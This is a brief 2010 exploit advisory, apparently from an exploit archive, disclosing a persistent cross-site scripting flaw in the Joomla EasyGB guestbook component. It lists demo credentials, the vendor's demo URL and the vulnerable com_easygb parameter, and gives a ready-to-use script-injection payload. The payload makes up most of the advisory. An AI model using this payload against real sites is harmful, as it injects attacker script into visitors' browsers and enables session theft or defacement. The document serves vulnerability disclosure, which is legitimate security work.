The Joomla EasyGB component suffers from a cross site scripting vulnerability.
8af042e88b7fb825259a4c59f23ef1edaafd37621e19db9f17edb8d376cb8347
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:Joomla Persistant XSS Vulnerable
Published: 2010-06-08
Vendor url:http://www.joomla-addons.org/
Platform: Unix, Linux , Windows
Greetz to:Sid3^effects, aa_Numb, M4n0, D4rk Blu3, KD and to all ICW members
#############################################################################################################################################################################
DESCRIPTION:
Contains Persistant XSS on Joomla
###############################################################################################################################################################################
Vulnerability:
Username: demo
Password: demo
The Site contains Persistant XSS Vulenrable on GuestBook
demo URL:-
Parameter:'"--><script>alert(0x000872)</script>
http:http://demo.joomla-addons.org/index.php?option=com_easygb&Itemid=6[XSS]
################################################################################################################################################################################
--
With R3gards,
L0rd CrusAd3r